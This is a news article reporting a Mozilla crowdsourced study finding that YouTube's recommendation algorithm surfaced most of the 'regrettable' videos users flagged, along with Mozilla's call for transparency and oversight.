
    YouTube algorithm surfaces potentially harmful videos, study finds | AppleInsider


    YouTube’s algorithm recommends objectionable, controversial, or otherwise problematic videos to its users, according to the results of a new crowdsourced study.

The study, published by Firefox maker Mozilla, found thousands of instances of YouTube recommending “regrettable” videos, a broad category that includes hate speech, violence, and misinformation.

According to the research, 71% of videos that were flagged as problematic came from YouTube’s own recommendations. The videos that surfaced tended to be much more popular, suggesting that the recommendation system favors controversial content.

About 9% of the “regrettable” videos were later pulled by YouTube for violating the platform’s own policies. The investigation also found that users in non-English-speaking countries were recommended problematic content at a 60% higher rate.

    To fix the YouTube recommendation problem, Mozilla calls for “common sense transparency laws, better oversight, and consumer pressure.”

    “Research by Mozilla and countless other experts has confirmed that there are significant harms associated with YouTube,” the organization wrote. “YouTube has made it clear that they are taking the wrong approach to managing this responsibility. We will only get closer to the right approach with greater openness, transparency, accountability, and humility.”

    Mozilla conducted the study over a 10-month period through Firefox and Chrome extensions that allowed users to report “regrettable” content, or content that they regretted watching.

In total, Mozilla gathered 3,362 reports submitted by 1,622 individual users across 91 countries. The study was carried out between July 2020 and June 2021. After collecting the data, Mozilla hired 42 University of Exeter researchers to review the submissions and assess whether the videos violated YouTube’s policies.

As for a more specific definition of a “YouTube Regret,” Mozilla’s report describes it as “hate speech, debunked political and scientific misinformation, and other categories of content that would likely … violate YouTube’s Community Guidelines.” It can also include “borderline content” that skirts YouTube’s policies without technically violating them but might still lead viewers down “dangerous paths.” Mozilla coined the term “YouTube Regret” in a 2019 crowdsourced study in which respondents self-identified content as “regrettable.”

The full results of the study, including researcher analysis, are available in Mozilla’s published report.

